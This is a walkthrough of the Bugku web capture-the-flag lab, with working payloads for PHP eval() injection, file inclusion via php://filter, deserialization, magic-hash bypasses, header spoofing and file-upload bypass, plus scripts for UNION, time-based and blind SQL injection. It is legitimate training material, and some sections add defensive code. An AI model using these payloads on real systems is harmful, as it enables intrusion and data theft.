bugku web challenges

1. web2

Just view the page source.

2. Calculator (计算器)

Much the same, except the flag is in js/code.js.

3. WEB basics: $_GET

Code:

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

Page output: flagflag{bugku_get_su8kej2en}

Append what=flag to the URL:

http://123.206.87.240:8002/get/?what=flag

4. WEB basics: $_POST

Code:

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

Send what=flag as POST data (from Firefox).

5. Contradiction (矛盾)

This challenge relies on PHP's loose comparison: when a non-numeric string is compared to an integer with ==, PHP (up to 7.x) converts the string by taking its leading digits and discarding the trailing letters.

Source:

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}

Visit: http://123.206.87.240:8002/get/index1.php?num=1x

"1x" is not numeric, so is_numeric() fails and we enter the if block; during the == comparison $num is converted to 1, so the check passes and the flag is printed. Caveat: PHP 8 changed this ("Saner string to number comparisons"): 1 == "1x" is now false, because a non-numeric string is compared to the integer as a string. The trick only works on PHP 7 and earlier.

6. web3

Open it in Firefox; it alerts in a loop, which Firefox eventually blocks. View the page source to find an HTML-entity-encoded string:

<!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;-->

These are HTML numeric character references; decode them to get the flag.

7. Domain resolution (域名解析)

Straightforward: add a record to C:\Windows\System32\drivers\etc\hosts (or /etc/hosts):

123.206.87.240 flag.baidu.com

Then browse to flag.baidu.com to get the flag.

8. Make it stop (必须让他停下来)

Open the page in Chrome, right-click and view the source, then keep refreshing that source view until the flag appears.

9. Local file inclusion (本地文件包含)

Code:

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>

Despite the title, the bug is code injection: eval() executes its argument as PHP code, so whatever is interpolated into the string runs as code. This is exactly how a one-line web shell works (assert() behaves the same way in old PHP).

So we want the server to execute:

var_dump(file_get_contents("flag.php"));

Since var_dump( ... ) is already wrapped around our input inside the eval, the value we submit is just:

file_get_contents("flag.php")

URL: http://123.206.87.240:8003/?hello=file_get_contents(%22flag.php%22)

Alternatively read it with file():

URL: http://123.206.87.240:8003/?hello=file(%22flag.php%22)

Right-click and view the page source; the dumped string precedes the highlighted source of index.php:

string(84) "<?php
$flag = 'Too Young Too Simple';
# echo $flag;
# flag{bug-ctf-gg-99};
?>"

10. Variable 1 (变量1)

Code:

flag In the variable ! <?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}
?>

Note the double $ in the eval: $$args is a variable variable, so with args=GLOBALS it becomes:

var_dump($GLOBALS)

which dumps every global, including the one defined in flag1.php. The ^\w+$ filter only allows word characters, and GLOBALS passes it. Output (after the highlighted source):

array(7) { ["GLOBALS"]=> *RECURSION* ["_POST"]=> array(0) { } ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}" ["args"]=> string(7) "GLOBALS" }

11. web5

JSFuck: paste it straight into the browser console; then, per the hint, uppercase the result.

12. First class (头等舱)

Capture the request with Burp and send it to Repeater; resend it and the flag is in the response.

13. Website hacked (网站被黑)

1. A directory scan (御剑) finds the admin page shell.php.
2. Brute-force the password with Burp: hack.

14. Admin system (管理员系统)

Step 1: capture the request and add X-Forwarded-For: 127.0.0.1 to spoof the source IP.

Step 2: view the page source; at the bottom a Base64 string decodes to the password test123.

Log in with the spoofed IP to get the flag.

15. web4

Concatenate the URL-encoded strings and decode them:

function checkSubmit(){
var a=document.getElementById("password");
if("undefined"!=typeof a){
if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)return!0;
alert("Error");
a.focus();
return!1
}
}
document.getElementById("levelQuest").onsubmit=checkSubmit;

Submit that value to get the flag.

16. The flag is in index (flag在index里)

Local file inclusion; construct the parameter:

file=php://filter/read=convert.base64-encode/resource=./index.php

The php://filter wrapper returns index.php Base64-encoded instead of executing it; decode it to get:

<html>
<title>Bugku-ctf</title>

<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

The blacklist blocks "../", "tp" (which kills http:// and ftp://), "input" and "data", but "php://filter" contains none of those substrings.

17. Enter the password to view the flag (输入密码查看flag)

Brute-force the password with Burp Intruder: 13579.

18. Click one million times (点击100万次)

Open the console with F12, run clicks=999999, then click once to get the flag.

19. Backups are a good habit (备份是个好习惯)

Brute-force the backup file path with SourceLeakHacker:

http://123.206.87.240:8002/web16/index.php.bak

The file:

<?php
/**
* Created by PhpStorm.
* User: Norse
* Date: 2017/8/6
* Time: 20:22
*/
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>

1. First get past str_replace('key','',...): it runs only once, so kkeyey1 becomes key1 after the replacement. (parse_str() with no second argument then registers $key1 and $key2 as variables; that form was removed in PHP 8.)

Method 1: exploit how md5() handles arrays:

http://123.206.87.240:8002/web16/?kkeyey1[]=123&kkeyey2[]=456

md5() of an array returns NULL (with a warning), so md5($key1) == md5($key2) is NULL == NULL, while the two arrays themselves are !== each other. (PHP 8 throws a TypeError here instead, so this only works on older versions.)

Method 2: exploit PHP's type juggling: use strings whose MD5 hash starts with 0e. Common ones:

QNKCDZO
240610708
s878926199a
s155964671a
s214587387a

The check uses ==, and a string of the form 0e<digits> is a numeric string in scientific notation (0 × 10^n = 0), so all of these hashes compare equal to 0 and to each other. That bypasses the == check while the plaintexts remain !== each other.
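Several challenges on this page (5, 19, 28, 31 and 33) ride on the same PHP == rules, so here is a small Python model of those rules together with a check of the 0e hashes listed above. This is an added example, not code from Bugku or from the original post: php_loose_eq() is my own approximation that covers only int and string operands, and the PHP 8 change is modelled with a flag rather than by running PHP.

```python
import hashlib
import re

# PHP's idea of a numeric string: optional leading whitespace, sign, integer or
# decimal, optional exponent.  This is the subset is_numeric() accepts.
NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")
# A "leading-numeric" string: numeric prefix followed by junk, e.g. "1x" or "42abc".
LEADING_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def php_is_numeric(s):
    return NUMERIC.match(s) is not None


def php_loose_eq(a, b, php8=False):
    """Model of PHP's == for int/str operands (my approximation, not the engine).

    str == str : numeric comparison only if BOTH sides are numeric strings,
                 otherwise byte-wise equality.  Unchanged in PHP 8.
    int == str : numeric string  -> numeric comparison (all versions)
                 non-numeric str -> PHP 7: string cast to number (leading
                                    digits, else 0); PHP 8: int cast to string
                                    and compared as strings.
    """
    if isinstance(a, str) and isinstance(b, str):
        if php_is_numeric(a) and php_is_numeric(b):
            return float(a) == float(b)
        return a == b
    num, s = (a, b) if isinstance(b, str) else (b, a)
    if php_is_numeric(s):
        return float(s) == num
    if php8:
        return str(num) == s
    m = LEADING_NUMERIC.match(s)
    return (float(m.group(0)) if m else 0.0) == num


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(h):
    """True if h is '0e' followed only by digits: PHP parses that as 0 * 10^n == 0."""
    return re.fullmatch(r"0e\d+", h) is not None


# The plaintexts listed on this page (plus the one used in challenge 31); each hashes to 0e...
MAGIC = ["QNKCDZO", "240610708", "s878926199a", "s155964671a", "s214587387a", "s1091221200a"]


def md5_collision_pairs(words):
    """All ordered pairs (x, y) with x !== y but md5(x) == md5(y) under loose ==,
    i.e. what the challenge-19 check md5($key1) == md5($key2) && $key1 !== $key2 accepts."""
    return [(x, y) for x in words for y in words
            if x != y and php_loose_eq(md5_hex(x), md5_hex(y))]


if __name__ == "__main__":
    print("challenge 5: 1 == '1x' is", php_loose_eq(1, "1x"), "on PHP 7 and",
          php_loose_eq(1, "1x", php8=True), "on PHP 8")
    for w in MAGIC:
        print(w, md5_hex(w), is_magic_hash(md5_hex(w)))
    print(len(md5_collision_pairs(MAGIC)), "usable pairs")
```

This is a model of the comparison rules the challenges exploit, not a reimplementation of PHP; for a given PHP version the only reliable oracle is php -r.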

20. Report card (成绩单)

Test for injection: id=-1' union select 1,2,3,4# works.

Dump table names:
id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

Dump column names (0x666c3467 is the hex encoding of 'fl4g', which avoids quotes):
id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

Dump the data:
id=-1' union select 1,2,3,skctf_flag from fl4g#

21. Qiuming Mountain driver (秋名山老司机)

The page shows an arithmetic expression that must be POSTed back within a couple of seconds. Script:

import requests
import re

web = requests.session()   # keep the session cookie; the expression is tied to it
s = web.get("http://123.206.87.240:8002/qiumingshan/")
# the expression sits in a <div> and ends with "=?;"
expr = re.search(r"<div>(.*?)</div>", s.text).group(1)[:-3]
answer = eval(expr)   # eval() on server-supplied text: acceptable for a CTF, never in real code
print(answer)
r = web.post("http://123.206.87.240:8002/qiumingshan/", data={"value": answer})
print(r.text)
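The script above eval()s text pulled straight out of the server's HTML, which is the same class of bug that challenge 9 exploits in the other direction. As an added example (my code, not from the original post), here is the same parse-and-solve step done with an AST whitelist. The page markup is a constructed sample; like the script above, it assumes the expression sits in a <div> and ends with "=?;".

```python
import ast
import operator
import re

# Constructed stand-in for the challenge page: the expression ends in "=?;".
SAMPLE_HTML = "<html><body><div>1234*56+78-9=?;</div></body></html>"

# Operators the evaluator accepts; anything else (calls, names, attributes,
# subscripts, ** with huge exponents) is rejected.
BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def parse_challenge(html):
    """Pull the expression out of the first <div>...</div> and drop the '=?;' tail."""
    m = re.search(r"<div>(.*?)</div>", html, re.S)
    if m is None:
        raise ValueError("no <div> with an expression found")
    expr = m.group(1).strip()
    if expr.endswith("=?;"):
        expr = expr[:-3]
    return expr.strip()


def safe_eval(expr):
    """Evaluate an arithmetic expression without eval(): parse to an AST and
    walk it, allowing only numeric literals and the operators listed above."""
    tree = ast.parse(expr, mode="eval")

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in BIN_OPS:
            return BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
            return UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError("disallowed syntax: " + type(node).__name__)

    return walk(tree)


def solve(html):
    """Answer for the challenge page: the value that would be POSTed as 'value'."""
    return safe_eval(parse_challenge(html))


if __name__ == "__main__":
    print(solve(SAMPLE_HTML))
```

A page that smuggles a call or an attribute access into the expression now gets a ValueError instead of code execution; malformed input raises SyntaxError from ast.parse.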

22. Be fast (速度要快)

Script (race-the-clock):

import requests
import base64

web = requests.session()
s = web.get("http://123.206.87.240:8002/web6/")
# the response header "flag" is Base64; decoded it reads "...: <second Base64 string>"
s1 = base64.b64decode(s.headers['flag']).decode("utf-8")
s2 = s1.split(": ")
print(s2[1])
# the second Base64 string decodes to the value that must be POSTed as "margin" before it expires
margin = base64.b64decode(s2[1]).decode("utf-8")
s3 = web.post("http://123.206.87.240:8002/web6/", data={"margin": margin})
print(s3.text)

23. Cookie spoofing (cookie欺骗)

The URL has two parameters, line and filename. filename is Base64: it decodes to keys.txt.
Base64-encoding index.php and requesting it returns only one line at a time, so script the read of index.php line by line:

import requests

url1 = "http://123.206.87.240:8002/web11/index.php?line="
url2 = "&filename=aW5kZXgucGhw"   # base64("index.php")
for i in range(60):
    url = url1 + str(i) + url2
    s = requests.get(url)
    print(s.text, end="")

Source obtained:

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

keys.php becomes readable once the cookie margin=margin is set. Exploit script:

import requests

url1 = "http://123.206.87.240:8002/web11/index.php?line="
url2 = "&filename=a2V5cy5waHA="   # base64("keys.php")
web = requests.session()
cookie = {"margin": "margin"}   # unlocks keys.php in $file_list
for i in range(60):
    url = url1 + str(i) + url2
    s = web.get(url, cookies=cookie)
    print(s.text, end="")

24. never give up

Check the hint 1p.html; visiting it redirects, so capture it with Burp:

var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E"
function OutWord()

The Words string is URL-encoded; URL-decoding it, Base64-decoding the comment and URL-decoding once more gives:

";if(!$_GET['id'])
{
header('Location: hello.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'no no no no no no no';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("f4l2a3g.txt");
}
else
{
print "never never never give up !!!";
}
?>

The require("f4l2a3g.txt") is the interesting part; rather than satisfying all of the conditions, just fetch that file directly.

Visit http://123.206.87.240:8006/test/f4l2a3g.txt to get the flag.

25. welcome to bugkuctf

Visiting shows the code:

you are not the number of bugku !

<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->

Key point:

php://input exposes the raw request body. Compared with $HTTP_RAW_POST_DATA it uses less memory and needs no special php.ini setting; it cannot be used with enctype=multipart/form-data. Here it lets us make file_get_contents($user) return whatever we POST.

So send:
txt=php://input&file=php://filter/read=convert.base64-encode/resource=./hint.php&password=3
with the POST body "welcome to the bugkuctf", and Base64-decode the result to get hint.php:

<?php

class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>

Swapping hint.php for flag.php gives what looks like garbled text.

Let's read index.php's source the same way:

<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];

if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){
echo "不能现在就给你flag哦";
exit();
}else{
include($file);
$password = unserialize($password);
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}

?>

<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->

The garbled text is presumably the echo "不能现在就给你flag哦" ("not giving you the flag yet") from the branch that rejects any file name containing "flag".

If the file name does not contain "flag" we reach the else branch, which unserialize()s $password and then echoes it: a textbook deserialization bug, since echoing a Flag object calls its __tostring(), which reads whatever file we put in $file.

Generate the serialized object:

<?php
class Flag{
public $file;
}

$a = new Flag();
$a->file = "flag.php";
$a = serialize($a);
print_r($a);
?>

Visit: 123.206.87.240:8006/test1/?txt=php://input&file=hint.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
with the POST body "welcome to the bugkuctf" to get the flag. (file=hint.php is what defines the Flag class before unserialize() runs.)

26. Bypass-the-dog one-liner (过狗一句话)

Use the exposed function to list the directory:

print_r(scandir('./'));

which reveals f14g.txt:

http://123.206.87.240:8010/?s=print_r(file_get_contents(%22f14g.txt%22));

That returns the flag.

27. Regular expression (正则表达式)

Build a string matching the given regex: id=/key123key12345key:/2/123keya:/i gives the flag.

28. Ex-girlfriend (前女友)

This tests the md5() array bypass, or the == / != bypass with strings whose MD5 starts with 0e, both already seen above. The new point is that strcmp() can also be bypassed with an array: it returns NULL instead of a number (PHP 5/7; PHP 8 throws a TypeError), which passes a == 0 check:

?v1=QNKCDZO&v2=240610708&v3[]=0

29. login

The hint is "SQL constraint attack", which meant nothing to me, so I opened the page and had a look.

After reading up on Baidu: when SQL compares strings, trailing spaces are ignored, so "admin" = "admin ". Register an account "admin " (with a trailing space) and log in with it to get the flag.

Further: if the column is limited to 25 characters, register 'vampire' padded with spaces to 25 characters followed by '1'; the stored value is truncated to 'vampire' plus spaces, and you can then log in as vampire.

30. are you from google

Capture with Burp and add a Referer header:

Referer: https://www.google.com

Resend to get the flag.

31. md5 collision (NUPT_CTF)

MD5 "collision", same trick as before: pass a value whose MD5 starts with 0e.

a=s1091221200a

32. Programmer's local website (程序员本地网站)

Even simpler than challenge 14: add the header X-Forwarded-For: 127.0.0.1.

33. Various bypasses (各种绕过)

Step 1: URL-encode "margin" and pass it as id.
Step 2: bypass the hash checks with arrays:

view-source:http://123.206.31.85:49162/?v1=QNKCDZO&v2=240610708&v3[]=0
POST: passwd[]=122

34. web8

Did this one before and forgot it again; the file read uses php://input, which returns the POST body:

http://123.206.87.240:8002/web8/?ac=123&fn=php://input

POST body: 123

35. Careful (细心)

Step 1: visit robots.txt, which contains:

User-agent: *
Disallow: /resusl.php

Visiting that page says you are not admin and your IP has been logged. Tried
x-forwarded-for: 127.0.0.1
client-ip: 127.0.0.1
with no luck; then, from the page source, requesting with x=admin gives the flag.

36. Get a shell (求getshell)

1. Content-Type: Multipart/form-data; the check is case-sensitive, so capitalising the M bypasses it.
2. Change the extension to .php5.
3. Below the filename, set Content-Type: image/jpeg.

37. insert into injection (insert into 注入)

There is no output, so only blind injection is possible. Blind injection comes in three kinds:

1. Boolean-based

2. Time-based

3. Error-based

Here only time-based works.

Three functions are used constantly when extracting data:

1. mid()
mid(string,start,length)
string (required): the string to take a substring of.
start (required): the starting position (1-based).
length (optional): the number of characters to return; if omitted, mid() returns the rest of the string.

2. substr()
substr(string,start,length)
string (required): the string to take a substring of.
start (required): where in the string to start.
length (optional): the length of the returned substring.

3. left()
left(string,length)

The time-based condition is built with case when <expr> then <expr> else <expr> end.

First a test payload:

x-forwarded-for: 1' and (case when 1=1 then sleep(10) else 1 end ) )#

The back end:

<?php
error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
?>

The statement actually executed: insert into client_ip (ip) values ('1' and (case when 1=1 then sleep(10) else 1 end))#')

Note that the ip value is taken from X-Forwarded-For with no validation and spliced straight into the INSERT, and the legacy mysql_* API offers no prepared statements.
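The getIp() above is what makes this challenge (and 14, 32 and 35) work: it believes X-Forwarded-For unconditionally and takes the first comma-separated entry, which is the one the client writes. As an added example (my code, not the challenge's), here is a Python mirror of that function beside a version that only honours the header when the TCP peer is a proxy we operate, walks the chain from the right, and validates the result as an IP literal, so an injection string like the one used above never reaches a query. All header and address values below are constructed for the demonstration.

```python
import ipaddress


def get_ip_vulnerable(headers, remote_addr):
    """Mirror of the challenge's getIp(): any client can set X-Forwarded-For,
    and the first entry is returned verbatim, quotes, SQL and all."""
    ip = headers.get("X-Forwarded-For", remote_addr)
    return ip.split(",")[0]


def get_ip_hardened(headers, remote_addr, trusted_proxies=()):
    """Client address for a request that arrived from remote_addr.

    - If the peer is not one of our proxies, the header is attacker-controlled
      and ignored: the peer address is the client.
    - Otherwise walk X-Forwarded-For from the right (each proxy appends the
      address it saw), skipping our own proxies; the first other address is
      the one that connected to our edge.
    - Every candidate must parse as an IP literal; anything else is discarded.
    """
    trusted = {ipaddress.ip_address(p) for p in trusted_proxies}
    peer = ipaddress.ip_address(remote_addr)
    if peer not in trusted:
        return str(peer)
    chain = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(chain):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            # garbage forwarded by our own proxy; stop rather than store it
            return str(peer)
        if addr not in trusted:
            return str(addr)
    return str(peer)


# Constructed requests: the third one carries the time-based payload from this challenge.
SAMPLES = [
    ({"X-Forwarded-For": "127.0.0.1"}, "203.0.113.5", ()),
    ({"X-Forwarded-For": "198.51.100.7, 10.0.0.1"}, "10.0.0.2", ("10.0.0.1", "10.0.0.2")),
    ({"X-Forwarded-For": "1' and (case when 1=1 then sleep(10) else 1 end ) )#"}, "203.0.113.5", ()),
]

if __name__ == "__main__":
    for headers, peer, proxies in SAMPLES:
        print(repr(get_ip_vulnerable(headers, peer)), "->", get_ip_hardened(headers, peer, proxies))
```

Validation alone is not the fix for the INSERT itself; that still needs a parameterised query. It does mean the "ip" column can never hold anything but an address, which closes this particular injection point.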

Reference payloads:

UNION SELECT 1,database(),3
UNION SELECT 1,version(),3
UNION SELECT 1,user(),3
UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata
UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=''
UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()
UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_schema=''

Notes taken during extraction:

client_ipflag

client0000flag
000ipflag

import requests
import time

url = "http://123.206.87.240:8002/web15/"

# characters tried at each position
CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*."


def timed_out(headers):
    """One request with a 1 s timeout: a server-side sleep(2) means the injected
    condition was true, and shows up here as a timeout exception."""
    try:
        requests.get(url, headers=headers, timeout=1)
        return False
    except requests.exceptions.RequestException:
        return True


def db_length():
    """Optional first step: length of the current database name."""
    for i in range(1, 100):
        headers = {'x-forwarded-for': "1' and (case when(length((select database()))=" + str(i) + ") then sleep(2) else 1 end))#"}
        if timed_out(headers):
            print("DB name length: " + str(i))
            return i


if __name__ == '__main__':
    result = ""
    for i in range(1, 33):
        for q in CHARSET:
            # earlier rounds used the same template with these inner queries:
            #   select database()
            #   SELECT group_concat(table_name) from information_schema.tables where table_schema=database()
            #   SELECT group_concat(column_name) from information_schema.columns where table_schema=database()
            headers = {'x-forwarded-for': "1' and (case when((substr((SELECT flag from flag) from " + str(i) + " for 1))='" + q + "') then sleep(2) else 1 end))#"}
            if timed_out(headers):
                # network jitter can also trip the timeout, so re-check twice and print the tally
                confirmed = sum(timed_out(headers) for _ in range(2))
                result += q
                print(str(i), ":", q, "confirmed", confirmed, "of 2 re-checks; so far:", result)
                time.sleep(2)   # let the server-side sleep() finish before the next probe
                break

# cdbf14c9551d5be5612f7bb5d2867853
# 16 18 20

Run the script above to get the flag.

38. A magic login box (这是一个神奇的登陆框)

Use sqlmap. Capture the login request with Burp and save it to 123.txt:

python2 sqlmap.py -r "C:\Users\heiyi\Desktop\sqlmap-master\123.txt" -p admin_name --dbs                          (databases)
python2 sqlmap.py -r "C:\Users\heiyi\Desktop\sqlmap-master\123.txt" -p admin_name -D bugkusql1 --tables          (tables)
python2 sqlmap.py -r "C:\Users\heiyi\Desktop\sqlmap-master\123.txt" -p admin_name -D bugkusql1 -T flag1 --dump   (data)

-r reads the request from a file; -p names the parameter to test.

39. Many times (多次)

First probe for injection, trying the comment styles --+, -- and # until one confirms it.

or 1=1 shows that keywords are being filtered.

Find out which with XOR-based tests:

http://123.206.87.240:9004/1ndex.php?id=1'^(length("union")!=0)--+

If "union" is not filtered, length("union")!=0 evaluates to 1, so id becomes 1^1 = 0 and the page breaks; if the keyword is stripped from the parameter, the expression is 0, id stays 1 and the page renders normally.

Testing shows and, or, union and select are filtered; bypass it by doubling the keyword (e.g. uniunionon).

The flag obtained that way was rejected; it turned out the address column holds the URL of the next stage:

http://123.206.87.240:9004/Once_More.php?id=1

which is injectable too.

After manual testing, the script:

import requests

if __name__ == '__main__':
    sss = ""
    for i in range(1, 50):
        for q in range(32, 127):   # printable ASCII, ascending
            if chr(q) in "'\\":
                continue   # would break the quoted string literal
            # earlier rounds used the same template with these inner queries:
            #   SELECT group_concat(table_name) from information_schema.tables where table_schema=database()   -> FLAG2
            #   SELECT group_concat(column_name) from information_schema.columns where table_schema=database() -> ID,NAME,FLAG2,ADDRE
            url = "http://123.206.87.240:9004/Once_More.php?id=1'^( case when( mid((SELECT group_concat(FLAG2) from flag2)," + str(i) + ",1)>'" + chr(q) + "' ) then 1 else 0 end) --+"
            try:
                s1 = requests.get(url, timeout=1)
                # "Hello" means the condition was false, i.e. the character is <= chr(q);
                # scanning q upwards, the first such q is the character itself.  The default
                # collation compares case-insensitively, so letters come out uppercase.
                if "Hello" in s1.text:
                    sss = sss + chr(q)
                    print(sss)
                    break
            except requests.exceptions.RequestException:
                print("error")
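Both scripts for this challenge try every candidate character in turn, roughly 60 to 95 requests per position, and the string comparison runs under MySQL's default case-insensitive collation, which is why the letters came back uppercase and I and l got confused. As an added example (my code, not from the original post or the other solutions quoted below), here is the same boolean oracle driven by a binary search on ascii(mid(...)), which needs at most 7 requests per character and returns exact case. The back end is simulated with a constructed secret so it runs offline; http_oracle() shows how the same extractor would be pointed at the real Once_More.php, and the same loop serves the time-based oracle of challenge 37 if the predicate is made to return True on a timeout.

```python
# Constructed secret standing in for flag2.FLAG2; mixed case on purpose.
SECRET = "flag{b1nary_Il_s3arch}"


def simulated_oracle(position, n):
    """Model of the page for the payload
      id=1'^(ascii(mid((select FLAG2 from flag2),{position},1))>{n})--+
    Returns True when 'Hello' is shown, i.e. the condition was FALSE (1^0 = 1,
    the row is found).  ascii('') is 0 for positions past the end."""
    code = ord(SECRET[position - 1]) if position <= len(SECRET) else 0
    return not (code > n)


def http_oracle(base_url):
    """Same predicate against the real target (not exercised here):
    True when the response contains 'Hello'."""
    import requests  # imported lazily so the offline demo has no dependency

    def oracle(position, n):
        payload = "1'^(ascii(mid((select FLAG2 from flag2),%d,1))>%d)--+" % (position, n)
        return "Hello" in requests.get(base_url, params={"id": payload}, timeout=5).text

    return oracle


def extract(oracle, max_len=64):
    """Recover the string one character at a time.  For each position find the
    smallest n in [0, 127] with oracle(pos, n) True, i.e. code <= n; that n is
    the character code.  n == 0 means ascii('') and therefore end of string."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(pos, mid):
                hi = mid          # code <= mid
            else:
                lo = mid + 1      # code > mid
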